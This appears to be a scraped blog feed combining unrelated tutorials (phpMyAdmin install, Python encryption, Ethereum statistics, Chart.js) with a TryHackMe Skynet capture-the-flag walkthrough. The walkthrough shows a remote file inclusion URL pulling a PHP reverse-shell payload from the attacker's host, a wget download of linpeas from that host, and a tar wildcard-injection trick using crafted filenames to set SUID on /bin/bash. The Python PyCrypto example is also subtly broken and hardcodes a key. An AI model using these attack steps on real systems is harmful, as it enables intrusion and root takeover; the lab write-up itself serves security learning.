    Method 2 is an easier one, which will automatically install as part of the WAMP package. Not only WAMP but all packages like XAMPP and LAMP also have the advantage of reducing the effort.

    In a previous tutorial, we have seen how to install XAMPP. It helped to set up an Apache, PHP, and MySQL database server environment on a server.

    install phpmyadmin windows

    Manual installation on top of the existing Apache server

    We have seen the advantages of phpMyAdmin managing databases through a web interface.

    Prerequisites

    Make sure that you have installed the following before start installing phpMyAdmin.

    • Apache server
    • MySQL server
    • PHP

    Then, follow the below steps.

    • Step 1: Download the phpMyAdmin project from its official website. Download the zip file to your browser by clicking the required downloadable.
    • Step 2: Unzip the downloaded zip and copy the phpMyAdmin project.
    • Step 3: Move the phpMyAdmin extracted folder to the Apache web root, the htdocs directory.
    • Step 4: Open the php.ini file found in the PHP config root. Make sure that the file has administrator permission to edit the config.
    • Step 5: Uncomment the following extensions to enable them.
      • php_mbstring.dll
      • php_mysqli.dll
    • Step 6: Restart Apache and MySQL servers.
    • Step 7: Run the phpMyAdmin application as same as you run other PHP applications on the Apache web root.
      • An example web address is http://localhost/phpmyadmin/. It will show the PHPMyAdmin home by listing all the databases.

    Installation via WAMP package

    We have seen a seven-step process of installing phpMyAdmin manually. Now, let’s see how the WAMP package provides an easy way of achieving this.

    • Step 1: Choose the suitable WAMP installer and click “download directly” -> “Download Latest Version”
    • Step 2: Double-click the downloaded WAMP installer and proceed with the wizards asking the following.
      • Choose language.
      • Accept the agreement.
      • Accept or configure the default browser.
      • Accept or Configure the default editor.
    • Step 3: Click “Finish” when the wizard prompts.
    • Step 4: Open the WAMP tool and choose phpMyAdmin from the menu.

    Thus, the phpMyAdmin is installed simply by this method.

    Conclusion

    Once installed, the phpMyAdmin will help manage the database easily via a web application interface. Previously, we saw steps to use the frequently used tools of this application. E.g., How to create a database using phpMyAdmin?

    This application helps connect a local or remote database by logging in via the landing login panel.

    ↑ Back to Top

    Share this page

    Posted on Leave a comment

    Two Easy Ways to Encrypt and Decrypt Python Strings

    5/5 – (1 vote)

    Today I gave a service consultant access to one of my AWS servers. I have a few files on the server that I was reluctant to share with the service consultant because these files contain sensitive personal data. Python is my default way to solve these types of problems. Naturally, I wondered how to encrypt this data using Python — and decrypt it again after the consultant is done? In this article, I’ll share my learnings! 👇

    🔐 Question: Given a Python string. How to encrypt the Python string using a password or otherwise and decrypt the encrypted phrase to obtain the initial cleartext again?

    There are several ways to encrypt and decrypt Python strings. I decided to share only the top two ways (my personal preference is Method 1):

    Method 1: Cryptography Library Fernet

    To encrypt and decrypt a Python string, install and import the cryptography library, generate a Fernet key, and create a Fernet object with it. You can then encrypt the string using the Fernet.encrypt() method and decrypt the encrypted string using the Fernet.decrypt() method.

    If you haven’t already, you must first install the cryptography library using the pip install cryptography shell command or variants thereof. 👉 See more here.

    Here’s a minimal example where I’ve highlighted the encryption and decryption calls:

    # Import the cryptography library
    from cryptography.fernet import Fernet # Generate a Fernet key
    key = Fernet.generate_key() # Create a Fernet object with that key
    f = Fernet(key) # Input string to be encrypted
    input_string = "Hello World!" # Encrypt the string
    encrypted_string = f.encrypt(input_string.encode()) # Decrypt the encrypted string
    decrypted_string = f.decrypt(encrypted_string) # Print the original and decrypted strings
    print("Original String:", input_string)
    print("Decrypted String:", decrypted_string.decode())

    This small script first imports the Fernet class from the cryptography library that provides high-level cryptographic primitives and algorithms such as

    • symmetric encryption,
    • public-key encryption,
    • hashing, and
    • digital signatures.

    A Fernet key is then generated and used to create a Fernet object. The input string to be encrypted is then provided as an argument to the encrypt() method of the Fernet object. This method encrypts the string using the Fernet key and returns an encrypted string.

    The encrypted string is then provided as an argument to the decrypt() method of the Fernet object. This method decrypts the encrypted string using the Fernet key and returns a decrypted string.

    Finally, the original string and the decrypted string are printed to the console.

    The output is as follows:

    Original String: Hello World!
    Decrypted String: Hello World!

    Try it yourself in our Jupyter Notebook:

    Method 2: PyCrypto Cipher

    Install and import the PyCrypto library to encrypt and decrypt a string. As preparation, you need to make sure to pad the input string to 32 characters using string.rjust(32) to make sure it is the correct length. Then, define a secret key, i.e., a “password”. Finally, encrypt the string using the AES algorithm, which is a type of symmetric-key encryption.

    You can then decrypt the encrypted string again by using the same key.

    Here’s a small example:

    # Import the PyCrypto library
    import Crypto # Input string to be encrypted (padding to adjust length)
    input_string = "Hello World!".rjust(32) # Secret key (pw)
    key = b'1234567890123456' # Encrypt the string
    cipher = Crypto.Cipher.AES.new(key)
    encrypted_string = cipher.encrypt(input_string.encode()) # Decrypt the encrypted string
    decrypted_string = cipher.decrypt(encrypted_string) # Print the original and decrypted strings
    print("Original String:", input_string)
    print("Decrypted String:", decrypted_string.decode())

    This code imports the PyCrypto library and uses it to encrypt and decrypt a string.

    The input string is "Hello World!", which is padded to 32 characters to make sure it is the correct length.

    Then, a secret key (password) is defined.

    The string is encrypted using the AES algorithm, which is a type of symmetric-key encryption.

    The encrypted string is then decrypted using the same key and the original and decrypted strings are printed. Here’s the output:

    Original String: Hello World!
    Decrypted String: Hello World!

    Try it yourself in our Jupyter Notebook:

    Thanks for Visiting! ♥

    To keep learning Python in practical coding projects, check out our free email academy — we have cheat sheets too! 🔥

    Posted on Leave a comment

    $821,000 Ethereum Value per Solidity Developer

    5/5 – (1 vote)

    Ethereum’s Total Value Locked (TVL) is $28,000,000,000 USD and Ethereum’s market cap is $193,000,000,000 USD. Based on my estimations below, there are at most 269,000 monthly active Solidity developers.

    Therefore, the Ethereum TVL per Solidity developer is more than $104,000, and the Ethereum market cap per Solidity developer is more than $717,000. So for all practical purposes, you can assume that the total value locked per Solidity developer is at least $821,000.*

    *I used very conservative assumptions; the real numbers will be much higher (see below). Also, I’m aware that not all Ethereum developers use Solidity, but most (see below). At the time of writing, we’re amid a bear market in 2023, with the TVL of both Ethereum and its Solidity smart contracts down roughly 70%. As the number of developers doesn’t grow proportionally to the price in a bull market, this number can be seen as a historic “worst-case” estimation.

    How Many Monthly Active Solidity Developers Are There?

    My basic assumption is that a monthly active Solidity developer checks the Solidity docs at least once per month. Currently, the Solidity docs have 580,000 visits per month and 2.15 pages per visit, so our estimate is 269,000 active Solidity developers per month.

    Reasons there are more Solidity developers: Some active Solidity developers may not check out the docs during development. However, I think this won’t change the number by more than a factor of 2-3x.

    Reasons there are fewer Solidity developers: On the other hand, this may be a significant overestimation of the number of Solidity devs because the number of sessions may be much larger than the number of active users. Many Solidity developers will check out the docs multiple times per month!

    So, the 269,000 Solidity developers per month number is likely to be a significant overestimation and can be seen as an upper bound. Consequently, the TVL per Solidity developer will be much larger than our $821,000 number, even considering that not all ETH dApp developers use Solidity (only most).

    If you’re interested in learning to create your own dApps and participate in this highly profitable growth market, check out our new Finxter Academy course:

    Posted on Leave a comment

    [TryHackMe] Skynet Walkthrough Using Remote File Inclusion

    5/5 – (1 vote)

    🔐 How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer

    YouTube Video

    CHALLENGE OVERVIEW

    • Link: https://tryhackme.com/room/skynet
    • Difficulty: Easy
    • Target: user/root flags
    • Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
    • Tools used: smbclient, smbmap, gobuster, metasploit
    • Tags: gobuster, smb, rfi, squirrelmail

    BACKGROUND

    In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.

    IPs

    export targetIP=10.10.144.117
    export myIP=10.6.2.23

    ENUMERATION

    sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn

    NMAP SCAN RESULTS

    Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
    Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 0.10% done
    Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
    Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
    Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
    Nmap scan report for 10.10.144.117
    Host is up (0.084s latency).
    Not shown: 65529 closed tcp ports (reset)
    PORT	STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
    | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
    |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
    80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Skynet
    110/tcp open pop3 Dovecot pop3d
    |_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
    139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    143/tcp open imap Dovecot imapd
    |_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
    445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 4 hops
    Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
    |_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
    | smb2-security-mode:
    | 3.1.1:
    |_	Message signing enabled but not required
    |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb2-time:
    | date: 2023-01-24T04:40:37
    |_ start_date: N/A
    | smb-security-mode:
    | account_used: guest
    | authentication_level: user
    | challenge_response: supported
    |_ message_signing: disabled (dangerous, but default)
    | smb-os-discovery:
    | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    | Computer name: skynet
    | NetBIOS computer name: SKYNET\x00
    | Domain name: \x00
    | FQDN: skynet
    |_ System time: 2023-01-23T22:40:36-06:00 TRACEROUTE (using port 554/tcp)
    HOP RTT ADDRESS
    1 13.67 ms 10.6.0.1
    2 ... 3
    4 81.31 ms 10.10.144.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
    

    DIRB SCAN RESULTS

    The SquirrelMail directory looks interesting. We’ll check that out in a minute.

    ENUMERATE THE SMB SHARE WITH NMAP SCAN

    nmap --script smb-enum-shares -p 139 10.10.144.117

    Output:

    Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
    Nmap scan report for 10.10.144.117
    Host is up (0.086s latency). PORT	STATE SERVICE
    139/tcp open netbios-ssn Host script results:
    | smb-enum-shares:
    | account_used: guest
    | \\10.10.144.117\IPC$:
    | Type: STYPE_IPC_HIDDEN
    | Comment: IPC Service (skynet server (Samba, Ubuntu))
    | Users: 1
    | Max Users: <unlimited>
    | Path: C:\tmp
    | Anonymous access: READ/WRITE
    | Current user access: READ/WRITE
    | \\10.10.144.117\anonymous:
    | Type: STYPE_DISKTREE
    | Comment: Skynet Anonymous Share
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\srv\samba
    | Anonymous access: READ/WRITE
    | Current user access: READ/WRITE
    | \\10.10.144.117\milesdyson:
    | Type: STYPE_DISKTREE
    | Comment: Miles Dyson Personal Share
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\home\milesdyson\share
    | Anonymous access: <none>
    | Current user access: <none>
    | \\10.10.144.117\print$:
    | Type: STYPE_DISKTREE
    | Comment: Printer Drivers
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\var\lib\samba\printers
    | Anonymous access: <none>
    |_	Current user access: <none>
    smbmap -H 10.10.144.117
    [+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
    

    LOGIN TO SAMBA SHARES AS ANONYMOUS

    smbclient //10.10.144.117/anonymous
    Password for [WORKGROUP\kalisurfer]:
    Try "help" to get a list of possible commands.
    smb: \> ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 grab the log1.txt (a password list)
    milesdyson (username)
    

    WALK THE WEBSITE

    We discovered a login portal for squirrelmail from the dirb scan. Let’s check it out now in our browser.

    http://10.10.144.117/squirrelmail

    Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.

    SquirrelMail version 1.4.23 [SVN]
    Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
    

    ENUMERATING THE SMB SHARE

    The first password from the log1.txt file from the smb share on the list works! We are in milesdyson’s email account now and see two interesting emails.

    serenakogan@skynet 01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
    01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111 skynet@skynet
    new smb password: )s{A&2Z=F^n_E.B`
    

    LOGIN TO SMB SHARE AS milesdyson

    smbclient //$targetIP/milesdyson -U milesdyson
    Password for [WORKGROUP\milesdyson]:
    Try "help" to get a list of possible commands.
    smb: \> ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019 9204224 blocks of size 1024. 5831424 blocks available
    

    Let’s grab the important.txt file:

    get important.txt

    Reading through the contents, we are pointed toward a hidden beta cms directory

    /45kra24zxs28v3yd

    GOBUSTER FOR DIRECTORY SNIFFING

    We’ll further enumerate the hidden beta cms directory now with gobuster.

    gobuster dir -uhttp://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
    
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url: http://10.10.169.173/45kra24zxs28v3yd/
    [+] Method: GET
    [+] Threads: 10
    [+] Wordlist: /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes: 404
    [+] User Agent: gobuster/3.1.0
    [+] Timeout: 10s
    ===============================================================
    2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta (Status: 403) [Size: 278]
    /.htaccess (Status: 403) [Size: 278]
    /.htpasswd (Status: 403) [Size: 278]
    /administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
    Progress: 337 / 4615 (7.30%) Progress: 397 / 4615 (8.60%) Progress: 456 / 4615 (9.88%) Progress: 507 / 4615 (10.99%) Progress: 558 / 4615 (12.09%) Progress: 618 / 4615 (13.39%) Progress: 674 / 4615 (14.60%) Progress: 728 / 4615 (15.77%) Progress: 788 / 4615 (17.07%) Progress: 845 / 4615 (18.31%) Progress: 898 / 4615 (19.46%) Progress: 956 / 4615 (20.72%) Progress: 1015 / 4615 (21.99%) Progress: 1072 / 4615 (23.23%) Progress: 1125 / 4615 (24.38%) Progress: 1185 / 4615 (25.68%) Progress: 1245 / 4615 (26.98%) Progress: 1299 / 4615 (28.15%) Progress: 1359 / 4615 (29.45%) Progress: 1419 / 4615 (30.75%) Progress: 1472 / 4615 (31.90%) Progress: 1532 / 4615 (33.20%) Progress: 1590 / 4615 (34.45%) Progress: 1640 / 4615 (35.54%) Progress: 1700 / 4615 (36.84%) Progress: 1750 / 4615 (37.92%) Progress: 1804 / 4615 (39.09%) Progress: 1864 / 4615 (40.39%) Progress: 1904 / 4615 (41.26%) Progress: 1964 / 4615 (42.56%) Progress: 2020 / 4615 (43.77%) /index.html (Status: 200) [Size: 418] Progress: 2063 / 4615 (44.70%) Progress: 2123 / 4615 (46.00%) Progress: 2173 / 4615 (47.09%) Progress: 2216 / 4615 (48.02%) Progress: 2273 / 4615 (49.25%) Progress: 2333 / 4615 (50.55%) Progress: 2383 / 4615 (51.64%) Progress: 2443 / 4615 (52.94%) Progress: 2503 / 4615 (54.24%) Progress: 2563 / 4615 (55.54%) Progress: 2618 / 4615 (56.73%) Progress: 2673 / 4615 (57.92%) Progress: 2733 / 4615 (59.22%) Progress: 2782 / 4615 (60.28%) Progress: 2842 / 4615 (61.58%) Progress: 2903 / 4615 (62.90%) Progress: 2962 / 4615 (64.18%) Progress: 3020 / 4615 (65.44%) Progress: 3075 / 4615 (66.63%) Progress: 3135 / 4615 (67.93%) Progress: 3194 / 4615 (69.21%) Progress: 3254 / 4615 (70.51%) Progress: 3305 / 4615 (71.61%) Progress: 3364 / 4615 (72.89%) Progress: 3424 / 4615 (74.19%) Progress: 3484 / 4615 (75.49%) Progress: 3544 / 4615 (76.79%) Progress: 3597 / 4615 (77.94%) Progress: 3655 / 4615 (79.20%) Progress: 3707 / 4615 (80.33%) Progress: 3767 / 4615 (81.63%) Progress: 3827 / 4615 (82.93%) Progress: 3887 / 4615 (84.23%) Progress: 3947 / 4615 (85.53%) Progress: 4001 / 4615 (86.70%) Progress: 4058 / 4615 (87.93%) Progress: 4115 / 4615 (89.17%) Progress: 4174 / 4615 (90.44%) Progress: 4234 / 4615 (91.74%) Progress: 4285 / 4615 (92.85%) Progress: 4338 / 4615 (94.00%) Progress: 4398 / 4615 (95.30%) Progress: 4458 / 4615 (96.60%) Progress: 4513 / 4615 (97.79%) Progress: 4570 / 4615 (99.02%) ===============================================================
    2023/01/24 09:53:04 Finished
    ===============================================================
    

    ADMINISTRATOR PORTAL DISCOVERED!

    http://10.10.169.173/45kra24zxs28v3yd/administrator/

    IDENTIFY A KNOWN VULNERABILITY

    Looking up the service name shows us that there is a remote file inclusion vulnerability.

    SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION

    After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:

    http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php

    STABILIZE THE SHELL

    python -c 'import pty;pty.spawn("/bin/bash")';

    ENUMERATE WITH LINPEAS

    After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to our target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.

    $ ./linpeas.sh
     ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄	▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version	: https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop
    

    🔐 ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.

    Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

    LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗
    ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝
    OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
    User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
    Hostname: skynet
    Writable folder: /dev/shm
    [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
    [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
    [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗
    ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝
    ╔══════════╣ Operative system
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
    Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
    Distributor ID: Ubuntu
    Description: Ubuntu 16.04.6 LTS
    Release: 16.04
    Codename: xenial ╔══════════╣ Sudo version
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
    Sudo version 1.8.16 ╔══════════╣ CVEs Check
    Vulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588 ---abbreviated ---
    THE MOST RELEVANT INFO FROM LINPEAS in bold:
    VULNERABLE TO CVE-2021-4034
    MAYBE CVE-2022-2588 https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh
    [+] [CVE-2017-16995] eBPF_verifier Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html Exposure: highly probable Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic} Download URL: https://www.exploit-db.com/download/45010 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
    

    FURTHER ENUMERATION

    Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.

    CHECK CRONJOBS

    cat /etc/crontab

    Output:

    # m h dom mon dow user command
    */1 * * * * root /home/milesdyson/backups/backup.sh
    17 * * * * root	cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    

    The first job in the list is set to run every minute and it just executes backup.sh. Let’s find out what that file does.

    We can see that backup.sh starts a new shell, changes directory to /var/www/html and then creates a tarball file of all the files from /var/www/html and stores it in home/milesdyson/backups/backup.tgz

    The * is a wildcard symbol that means everything in the current directory. We can exploit this by adding our own files and using file names with unusual extensions to launch a malicious file, magic.sh as part of the automated cronjob that runs backup.sh and creates a tarball every minute of the contents of the directory.

    PLAN AND CARRY OUT PRIVILEGE ESCALATION

    First, we’ll create the magic.sh file that will add a SUID bit to /bin/bash. The next time we spawn a shell after setting up the hack and waiting at least 1 minute, we can use persistence mode (/bin/bash -p) to spawn a root shell.

    printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh

    Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our magic.sh program and add the SUID bit to /bin/bash.

    echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
    echo "/var/www/html" > --checkpoint=1

    USER FLAG

    Let’s grab the root flag from /home/milesdyson

    $ cat user.txt
    7c—-omitted—----07

    ROOT FLAG

    cat /root/root.txt
    3f—-omitted—----49

    TAKE-AWAYS

    Takeaway #1 – The simpler solution is usually the better solution. - I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session.

    In the end, I learned I had overlooked setting the payload on msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.

    It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.

    Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.

    Posted on Leave a comment

    Chart JS Doughnut

    by Vincy. Last modified on January 30th, 2023.

    The doughnut chart is similar to the pie chart except for the cutout area in the middle of the pie graph.

    It shows the partitions out of a boundary taken. The circle of the pie or doughnut chart is the boundary and the partitions give relational statistics.

    This quick example has the Chart JS JavaScript to display a doughnut chart. Earlier, we started with Chart JS line chart and have seen many examples for this library.

    Quick example

    <!DOCTYPE html>
    <html>
    <head>
    <title>Chart JS Doughnut</title>
    <link rel='stylesheet' href='style.css' type='text/css' />
    </head>
    <body> <div class="phppot-container"> <h1>Chart JS Doughnut</h1> <div> <canvas id="chartjs-doughnut"></canvas> </div> </div> <script src="https://cdn.jsdelivr.net/npm/chart.js@4.0.1/dist/chart.umd.min.js"></script> <script> new Chart(document.getElementById("chartjs-doughnut"), { type: 'doughnut', data: { labels: ["Lion", "Horse", "Elephant", "Tiger", "Jaguar"], datasets: [{ backgroundColor: ["#51EAEA", "#FCDDB0", "#FF9D76", "#FB3569", "#82CD47"], data: [418, 263, 434, 586, 332] }] }, options: { title: { display: true, text: 'Chart JS Doughnut.' }, cutout: '60%', // the portion of the doughnut that is the cutout in the middle radius: 200 } }); </script>
    </body>
    </html>
    

    In a previous article, we have seen how to create Chart JS JavaScript library to create a pie chart.

    The code doughnut chart differs only by the property type: doughnut instead of type: pie.

    Output

    It displays the count of an animal on each wing of the doughnut chat.

    As in the pie chart example, the animal names are taken for the “labels” property. The count of each animal is the chart data. Different background colors classify it in the doughnut chart.

